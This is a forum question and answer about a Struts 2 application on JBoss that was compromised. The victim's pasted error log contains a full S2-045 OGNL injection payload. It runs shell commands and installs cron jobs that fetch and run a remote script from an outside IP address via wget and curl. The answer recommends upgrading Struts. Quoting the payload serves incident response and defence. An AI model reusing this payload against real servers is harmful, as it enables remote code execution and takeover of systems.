We have have a J2EE Struts 2 application.

Recently we saw some intrusions are coming to our application which runs on port 80. The Jboss (version 4.2.0) error log gives this:

the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "15 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n50 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

They are injecting some .exe files into the Jboss bin folder and tries to interrupt the application as well as server. Already installed some anti virus software there. But that doesn't stop. Thinking about how to stop them from the application.

Any good idea will be helpful.

You've been attacked through the S2-045 critical security issue.

The simplest solution to your problem is to upgrade immediately to either 2.3.32 or 2.5.10.1
(the former will require almost zero refactoring, the latter would require a quick migration, described in the Struts 2.3 to 2.5 Migration Guide).

Always stay up-to-date.